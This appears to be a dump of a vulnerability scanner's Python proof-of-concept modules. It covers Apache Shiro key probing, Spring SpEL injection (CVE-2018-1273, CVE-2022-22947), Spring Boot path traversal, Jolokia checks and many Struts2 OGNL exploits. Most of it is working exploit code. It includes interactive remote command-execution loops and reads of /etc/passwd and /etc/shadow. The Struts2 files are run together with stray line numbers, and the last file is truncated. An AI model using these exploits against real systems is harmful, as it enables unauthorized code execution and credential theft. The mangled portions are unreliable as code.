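        "kPH+bIxk5D2deZiIxcaaaA==": "3vakOJDcITulYawMdd4UijbPyPpv8wZkOZ7Yt0wBjT4GCmUbx1yXymqb1BLnkvBmJlQ/AWSKtysv9yV4IwHA2sr41OgrkhFABXpf3OJd8xei5RUuTMJVEVklCQuZD/diciR0hSKqwlw0vJ40XU41Osv2wsVVIurD7FoGziYufa74Jbo1VW7oWtWVNyaRLVyA",
    }
    if not check_shiro(url):
        return relsult
    for key, payload in payload_dict.items():
        cookies = {'rememberMe': payload}
        try:
            # stream=True: only the headers matter; the context manager closes the
            # connection, which the original left open.
            with requests.get(url, headers=headers, cookies=cookies, timeout=3, verify=False, stream=True, allow_redirects=False) as r:
                accepted = 'rememberMe=deleteMe' not in str(r.headers)
        except requests.RequestException:
            continue
        if accepted:
            relsult['vulnerable'] = True
            relsult['url'] = url
            relsult['key'] = key
            relsult['about'] = 'https://github.com/feihong-cs/ShiroExploit'
            return relsult
    return relsult


def check_shiro(url):
    """Return True when the target sets ``rememberMe=deleteMe`` for an invalid rememberMe cookie (Shiro fingerprint).

    NOTE(review): this request follows redirects while the key probes in verify()
    do not, so the two look at different responses for targets that redirect.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)',
    }
    cookies = {'rememberMe': "123"}
    try:
        res = requests.get(url, verify=False, headers=headers, cookies=cookies, timeout=3)
        return 'rememberMe=deleteMe' in str(res.headers)
    except requests.RequestException:
        return False
# -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2018_1273.py: --------------------------------------------------------------------------------
import requests, urllib
import re
import inc.dnslog


def verify(url):
    """Spring Data Commons SpEL injection (CVE-2018-1273) -- error-based check.

    Only probes targets whose root answers with a Spring Boot style 404 JSON page
    (``timestamp`` and ``status`` in the body).  Two SpEL payloads are POSTed to
    ``/users``: one running ``whoami`` and one running a non-existent command; the
    target is flagged when both return HTTP 500, the first containing
    "Invalid property" and the second "A problem occurred".  Note that this
    executes ``whoami`` on the target as part of verification.
    """
    relsult = {
        'name': 'spring 代码执行(CVE-2018-1273)',
        'vulnerable': False,
        'attack': True,
    }
    headers = {
        "Content-type": "application/x-www-form-urlencoded"
    }
    try:
        rep = requests.get(url, timeout=3)
        if re.search('timestamp', rep.text) and re.search('status', rep.text) and rep.status_code == 404:
            vurl = urllib.parse.urljoin(url, '/users')
            payload = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")]'''
            payload2 = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("aaaaaa")]'''
            rep1 = requests.post(vurl, headers=headers, data=payload, timeout=3)
            rep2 = requests.post(vurl, headers=headers, data=payload2, timeout=3)
            if rep1.status_code == rep2.status_code == 500 and re.search('Invalid property', rep1.text) and re.search('A problem occurred', rep2.text):
                relsult['vulnerable'] = True
                relsult['url'] = url
                relsult['about'] = 'https://www.cnblogs.com/cute-puli/p/15338017.html'
        return relsult
    except requests.RequestException:
        return relsult


def attack(url):
    """Blind command execution confirmed via dnslog, then an interactive no-output loop.

    Requires --dnslog.  First fires ``ping <dnslog-domain>`` through the SpEL sink
    and waits for the DNS callback; if it arrives, commands typed at the prompt are
    sent blind (check the dnslog server / your VPS for their effect).  Commands are
    interpolated into a Java double-quoted string unescaped, so ``"`` in a command
    breaks the payload.  ``exit`` leaves the loop without being sent.  Returns True
    whenever the dnslog flow ran -- even without a callback -- matching the original
    control flow; False when --dnslog is missing or something raised.
    """
    try:
        dnslog = inc.dnslog.Dnslog()
        dnslog_domain = dnslog.dnslog_getdomain()
        if not dnslog_domain:
            print('[-] 该exp将调用dnslog进行检测,请追加 --dnslog 参数!')
            return False
        print('[+] 获取到dnslog域名 {0}'.format(dnslog_domain))
        headers = {
            "Content-type": "application/x-www-form-urlencoded"
        }
        vurl = urllib.parse.urljoin(url, '/users')
        cmd = 'ping {0}'.format(dnslog_domain)
        payload = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%s")]'''
        try:
            requests.post(vurl, headers=headers, data=payload % cmd, timeout=5)
        except requests.RequestException:
            # A timeout is not a failure here: the callback, not the HTTP reply, is the signal.
            pass
        print('[+] 尝试执行命令: {0}'.format(cmd))
        print('[+] 等待检测回显 .........')
        dnslog.dnslog_sleep()
        dnslog_rep = dnslog.dnslog_getrep()
        if re.search(re.escape(dnslog_domain), dnslog_rep):
            print('[+] 检测到回显,目标存在漏洞-CVE-2018-1273!')
            print('[*] 开始执行无回显命令,输入exit退出!')
            while True:
                cmd = input('[+] 执行命令(无回显)>')
                if cmd == 'exit':
                    break
                requests.post(vurl, headers=headers, data=payload % cmd, timeout=5)
                print('[+] 命令执行成功请手动用dnslog或vps检查!')
        else:
            print('[-] 未检测到回显,目标可能不出网或等待时间过短')
        return True
    except Exception:
        return False


# Leftover development harness: running this module directly probes a hard-coded
# third-party host.  Consider removing it.
if __name__ == '__main__':
    print(verify('http://vulfocus.fofa.so:55508/'))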
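# -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2021_21234.py: --------------------------------------------------------------------------------
import requests, re
# explicit submodule import: plain "import urllib" does not guarantee urllib.parse is loaded
import urllib.parse


def verify(url):
    """Spring Boot Actuator Logview path traversal (CVE-2021-21234).

    Reads ``/etc/passwd`` and ``/etc/hosts`` through ``/manage/log/view`` with a
    ``base`` made of ``../`` segments and flags the target when both look genuine
    (``root:x:`` and ``localhost``).  Requests are sent with ``verify=False`` like
    the other PoCs so self-signed HTTPS targets are not silently reported clean.
    """
    relsult = {
        'name': 'Spring Boot 目录遍历 (CVE-2021-21234)',
        'vulnerable': False,
        'attack': True,
    }
    try:
        payload1 = '/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../../../'
        payload2 = '/manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../../../'
        vurl1 = urllib.parse.urljoin(url, payload1)
        vurl2 = urllib.parse.urljoin(url, payload2)
        rep1 = requests.get(vurl1, timeout=3, verify=False)
        rep2 = requests.get(vurl2, timeout=3, verify=False)
        if re.search('root:x:', rep1.text) and re.search('localhost', rep2.text):
            relsult['vulnerable'] = True
            relsult['url'] = url
            relsult['verify'] = vurl1
            relsult['about'] = 'https://blog.csdn.net/ML_Team/article/details/121032049'
        return relsult
    except requests.RequestException:
        return relsult


def attack(url):
    """Dump /etc/passwd, /etc/hosts and /etc/shadow through the traversal and print them.

    URLs are built with ``urljoin`` exactly like ``verify`` (the original concatenated
    ``url + payload``, which yields ``//manage/...`` for URLs ending in ``/`` and so
    could fail where verify succeeded).  ``/etc/shadow`` holds password hashes --
    only pull it when the engagement scope allows.  Returns True unless a request
    fails.
    """
    try:
        payload = '/manage/log/view?filename={0}&base=../../../../../../../../../../../../'
        for target_file in ('/etc/passwd', '/etc/hosts', '/etc/shadow'):
            vurl = urllib.parse.urljoin(url, payload.format(target_file))
            print('[*] 尝试读取{0}....'.format(target_file))
            print('[*] payload: {0}'.format(vurl))
            rep = requests.get(vurl, timeout=3, verify=False)
            print(rep.text)
        return True
    except requests.RequestException:
        return False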
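# -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2022_22947.py: --------------------------------------------------------------------------------
import requests
import re
import urllib
import random, string
import json


def verify(url):
    """Spring Cloud Gateway actuator SpEL injection (CVE-2022-22947).

    Creates a throw-away route (random 7-char id) whose ``AddResponseHeader`` filter
    value is a SpEL expression running ``id``, POSTs ``/actuator/gateway/refresh`` so
    the expression is evaluated, then reads the route back looking for
    ``uid=...gid=...groups=``.  This executes a command on the target and registers
    a malicious route; the route is deleted (and routes refreshed again) on the way
    out -- the original left the RCE route live on the gateway after every scan.
    Cleanup is best effort.
    """
    relsult = {
        'name': 'Spring Cloud Gateway Actuator API SpEL 代码注入 (CVE-2022-22947)',
        'vulnerable': False,
        'attack': False,
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'en',
        'Connection': 'close',
        'Content-Type': 'application/json',
    }
    cmd = 'id'
    timeout = 3
    rand_str = ''.join(random.sample(string.digits + string.ascii_letters, 7))
    payload = {
        "id": rand_str,
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"%s\"}).getInputStream()))}" % cmd
            }}],
        "uri": "http://example.com"
    }
    vurl1 = urllib.parse.urljoin(url, '/actuator/gateway/routes/' + rand_str)
    vurl2 = urllib.parse.urljoin(url, '/actuator/gateway/refresh')
    created = False
    try:
        rep1 = requests.post(vurl1, timeout=timeout, data=json.dumps(payload), headers=headers, verify=False)
        if rep1.status_code == 201:
            created = True
            rep2 = requests.post(vurl2, timeout=timeout, headers=headers, verify=False)
            rep3 = requests.get(vurl1, timeout=timeout, headers=headers, verify=False)
            if rep2.status_code == 200 and re.search('uid=.+gid=.+groups=.+', rep3.text):
                relsult['vulnerable'] = True
                relsult['url'] = url
                relsult['payload'] = vurl1
                relsult['about'] = 'https://mp.weixin.qq.com/s/kCbcKuPqy9Ar-arjMYgUmw'
        return relsult
    except requests.RequestException:
        return relsult
    finally:
        if created:
            _cleanup_route(vurl1, vurl2, headers, timeout)


def _cleanup_route(route_url, refresh_url, headers, timeout):
    """Delete the route verify() created (same actuator path, DELETE) and refresh; failures are ignored."""
    try:
        requests.delete(route_url, timeout=timeout, headers=headers, verify=False)
        requests.post(refresh_url, timeout=timeout, headers=headers, verify=False)
    except requests.RequestException:
        pass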
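# -------------------------------------------------------------------------------- /pocs/framework/spring/jolokia_logback_jndi_rce.py: --------------------------------------------------------------------------------
import requests
import urllib, re


def verify(url):
    """Fingerprint-only check for the Jolokia + logback ``JMXConfigurator`` JNDI RCE path.

    Flags the target when ``/jolokia/list`` answers HTTP 200 and exposes
    ``ch.qos.logback.classic.jmx.JMXConfigurator`` together with ``reloadByURL``.
    Nothing is exploited; an exposed MBean is an indicator, not proof (see the
    ``about`` link for the actual exploitation chain).
    """
    relsult = {
        'name': 'jolokia logback JNDI RCE',
        'vulnerable': False,
        'attack': False,
        'url': url,
        'about': 'https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce',
    }

    try:
        vurl = urllib.parse.urljoin(url, '/jolokia/list')
        rep = requests.get(vurl, verify=False, timeout=5)
        # raw string: the original wrote '\.' in a plain string, an invalid escape
        # sequence (SyntaxWarning on current Python).
        if rep.status_code == 200 and re.search(r'ch\.qos\.logback\.classic\.jmx\.JMXConfigurator', rep.text) and re.search('reloadByURL', rep.text):
            relsult['vulnerable'] = True
        return relsult
    except requests.RequestException:
        return relsult
# -------------------------------------------------------------------------------- /pocs/framework/spring/jolokia_realm_jndi_rce.py: --------------------------------------------------------------------------------
import requests
import urllib, re


def verify(url):
    """Fingerprint-only check for the Jolokia + Tomcat ``createJNDIRealm`` JNDI RCE path.

    Flags the target when ``/jolokia/list`` answers HTTP 200 and lists
    ``type=MBeanFactory`` together with ``createJNDIRealm``.  Nothing is exploited;
    the exposed operation is an indicator, not proof (see the ``about`` link).
    """
    relsult = {
        'name': 'jolokia Realm JNDI RCE',
        'vulnerable': False,
        'attack': False,
        'url': url,
        'about': 'https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce',
    }

    try:
        vurl = urllib.parse.urljoin(url, '/jolokia/list')
        rep = requests.get(vurl, verify=False, timeout=5)
        if rep.status_code == 200 and re.search('type=MBeanFactory', rep.text) and re.search('createJNDIRealm', rep.text):
            relsult['vulnerable'] = True
        return relsult
    except requests.RequestException:
        return relsult
# -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_001.py: --------------------------------------------------------------------------------
import requests
import re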
import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-001 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | s = requests.Session() 12 | response = s.get(url, timeout=3) 13 | forms = re.findall(r'', response.text, re.DOTALL) 14 | for form in forms: 15 | action = re.findall(r'action="([^"]*)"', form)[0] 16 | vulurl = urllib.parse.urljoin(url, action) 17 | inputs = re.findall(r'', form) 18 | first = True 19 | payload = '' 20 | for input in inputs: 21 | try: 22 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 23 | if first: 24 | payload += p + '={0}' 25 | first = False 26 | else: 27 | payload += '&' + p + '={0}' 28 | except: 29 | continue 30 | payload = payload.format('%25{43210*40123}') 31 | headers = { 32 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 33 | 'Content-Type': 'application/x-www-form-urlencoded', 34 | } 35 | req = s.post(vulurl, data=payload, headers=headers, timeout=3) 36 | if re.search(r'1733714830', req.text): 37 | relsult['vulnerable'] = True 38 | relsult['method'] = 'POST' 39 | relsult['url'] = vulurl 40 | relsult['position'] = 'data' 41 | relsult['payload'] = payload 42 | return relsult 43 | except: 44 | return relsult 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_005.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-005 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = 
r'redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27id%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}' 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | req = requests.post(url, data=payload, headers=headers, timeout=3) 17 | if re.search('uid=.+ gid=.+ groups=.+', req.text): 18 | relsult['vulnerable'] = True 19 | relsult['method'] = 'POST' 20 | relsult['url'] = url 21 | relsult['position'] = 'data' 22 | relsult['payload'] = payload 23 | return relsult 24 | except: 25 | return relsult 26 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_007.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-007 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | s = requests.Session() 13 | response = s.get(url, timeout=3) 14 | forms = re.findall(r'', response.text, re.DOTALL) 15 | for form in forms: 16 | action = re.findall(r'action="([^"]*)"', form)[0] 17 | vulurl = urllib.parse.urljoin(url, action) 18 | inputs = re.findall(r'', form) 19 | first = True 20 | payload = '' 21 | for input in inputs: 22 | try: 23 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 24 | if first: 25 | payload += p 
+ '={0}' 26 | first = False 27 | else: 28 | payload += '&' + p + '={0}' 29 | except: 30 | continue 31 | payload = payload.format(r"'%2b(95221%2b924%2b524)%2b'") 32 | headers = { 33 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 34 | 'Content-Type': 'application/x-www-form-urlencoded', 35 | } 36 | req = s.post(vulurl, data=payload, headers=headers, timeout=3) 37 | if re.search(r'95221924524', req.text): 38 | relsult['vulnerable'] = True 39 | relsult['method'] = 'POST' 40 | relsult['url'] = vulurl 41 | relsult['position'] = 'data' 42 | relsult['payload'] = payload 43 | return relsult 44 | 45 | except: 46 | return relsult 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_008.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-008 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload1 = r'?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29)' 12 | vulurl = urllib.parse.urljoin(url, payload1) 13 | req = requests.get(vulurl, timeout=3) 14 | if re.search('uid=.+ gid=.+ groups=.+', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['method'] = 'GET' 17 | relsult['url'] = url 18 | relsult['payload'] = vulurl 19 | return relsult 20 | except: 21 | return relsult 22 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_009.py: -------------------------------------------------------------------------------- 1 | import re 2 | import 
requests 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-009 Remote Code Execution Vulnerability', 9 | 'vulnerable': False 10 | } 11 | hash_flag = 's3uih34saj1kd7827hzf' 12 | payload = r'/ajax/example5?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%22echo%20s3uih34saj1kd7827hzf%22).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]' 13 | payload2 = r'/ajax/example5?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%22s3uih34saj1kd7827hzf%22).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]' 14 | vulurl = urllib.parse.urljoin(url, payload) 15 | vulurl2 = urllib.parse.urljoin(url, payload2) 16 | try: 17 | req = requests.get(vulurl, timeout=3) 18 | req2 = requests.get(vulurl2, timeout=3) 19 | if re.search(hash_flag, req.text): 20 | if re.search(hash_flag, req2.text) and len(req2.text) < len(req.text): 21 | pass 22 | else: 23 | relsult['vulnerable'] = True 24 | relsult['method'] = 'GET' 25 | relsult['url'] = url 26 | relsult['payload'] = vulurl 27 | return relsult 28 | except: 29 | return relsult 30 | 31 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_012.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'S2-012 Remote Code Execution Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | s = requests.Session() 12 | response = s.get(url, timeout=3) 13 | forms = re.findall(r'', response.text, re.DOTALL) 14 | for form in forms: 15 | action = re.findall(r'action="([^"]*)"', form)[0] 16 | vulurl = urllib.parse.urljoin(url, action) 17 | inputs = re.findall(r'', form) 18 | first = True 19 | payload = '' 20 | for input in inputs: 21 | try: 22 | p = re.findall(r'name=[\'\"]([^\'\"]+)[\'\"]', input)[0] 23 | if first: 24 | payload += p + '={0}' 25 | first = False 26 | else: 27 | payload += '&' + p + '={0}' 28 | except: 29 | continue 30 | flag = 'tgs72j23u8933j3rxben1' 31 | basic_payload1 = r'%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22echo%22%2C+%22tgs72j23u8933j3rxben1%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D' 32 | basic_payload2 = 
r'%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22tgs72j23u8933j3rxben1%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D' 33 | payload1 = payload.format(basic_payload1) 34 | payload2 = payload.format(basic_payload2) 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | 'Content-Type': 'application/x-www-form-urlencoded', 38 | } 39 | req1 = s.post(vulurl, data=payload1, headers=headers, timeout=3) 40 | req2 = s.post(vulurl, data=payload2, headers=headers, timeout=3) 41 | if re.search(flag, req1.text): 42 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 43 | pass 44 | else: 45 | relsult['vulnerable'] = True 46 | relsult['method'] = 'POST' 47 | relsult['url'] = vulurl 48 | relsult['position'] = 'data' 49 | relsult['payload'] = payload1 50 | return relsult 51 | except: 52 | return relsult 53 | 54 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_013.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-013/S2-014 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | payload = 
r'''?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D''' 12 | vulurl = urllib.parse.urljoin(url, payload) 13 | try: 14 | req = requests.get(vulurl, timeout=3) 15 | if re.search('uid=.+ gid=.+ groups=.+', req.text) and req.status_code == 200: 16 | relsult['vulnerable'] = True 17 | relsult['method'] = 'GET' 18 | relsult['url'] = url 19 | relsult['payload'] = vulurl 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | 25 | def attack(url): 26 | try: 27 | cmd = '' 28 | print('[+] 开始执行命令,输出exit退出') 29 | basic_payload = r"?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{0}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D" 30 | while cmd != 'exit': 31 | cmd = input('[+] 执行命令> ') 32 | payload = basic_payload 33 | payload = payload.format(cmd) 34 | vulurl = urllib.parse.urljoin(url, payload) 35 | req = requests.get(vulurl, timeout=3) 36 | print('[*] 输出结果:') 37 | print(req.text) 38 | return True 39 | except: 40 | return False 41 | 42 | 43 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_015.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 
'S2-015 Remote Code Execution Vulnerablity', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'e5e67yds88291hshzqml9s0' 13 | payload1 = r'/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20e5e67yds88291hshzqml9s0%27%29.getInputStream%28%29%29%2C%23q%7D.action' 14 | payload2 = r'/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27e5e67yds88291hshzqml9s0%27%29.getInputStream%28%29%29%2C%23q%7D.action' 15 | vulurl1 = urllib.parse.urljoin(url, payload1) 16 | vulurl2 = urllib.parse.urljoin(url, payload2) 17 | 18 | req1 = requests.get(vulurl1, timeout=3) 19 | req2 = requests.get(vulurl2, timeout=3) 20 | if re.search(flag, req1.text): 21 | if re.search(flag, req2.text) and len(req2.text) < len (req1.text): 22 | pass 23 | else: 24 | relsult['vulnerable'] =True 25 | relsult['method'] = 'GET' 26 | relsult['url'] = url 27 | relsult['payload'] = vulurl1 28 | return relsult 29 | 30 | except: 31 | return relsult 32 | 33 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_016.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-016 Remote Code Execution Vulnerability', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'dqub23akjj21sd2kx75xa123f' 13 | cmd_shell = 'echo+' + flag 14 | payload = 
r'?redirect:%24%7b%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2c%23f.setAccessible(true)%2c%23f.set(%23_memberAccess%2ctrue)%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%22{0}%22).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b5000%5d%2c%23c.read(%23d)%2c%23genxor%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2c%23genxor.println(%23d)%2c%23genxor.flush()%2c%23genxor.close()%7d' 15 | payload1 = payload.format(cmd_shell) 16 | payload2 = payload.format(flag) 17 | vulurl1 = urllib.parse.urljoin(url, payload1) 18 | vulurl2 = urllib.parse.urljoin(url, payload2) 19 | req1 = requests.get(vulurl1, timeout=3) 20 | req2 = requests.get(vulurl2, timeout=3) 21 | if re.search(flag, req1.text): 22 | if re.search(flag, req2.text) and len(req2.text) < len(req1.text): 23 | pass 24 | else: 25 | relsult['vulnerable'] = True 26 | relsult['method'] = 'GET' 27 | relsult['url'] = url 28 | relsult['payload'] = vulurl1 29 | relsult['exp'] = True 30 | return relsult 31 | except: 32 | return relsult 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /pocs/framework/struct2/s2_032.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'S2-032 Remote Code Execution Vulnerablity(CVE-2016-3081)', 9 | 'vulnerable': False 10 | } 11 | try: 12 | flag = 'sdfs7sdh32k4h9ffsj23aqv4mn' 13 | cmd_shell = 'echo+' + flag 14 | payload = 
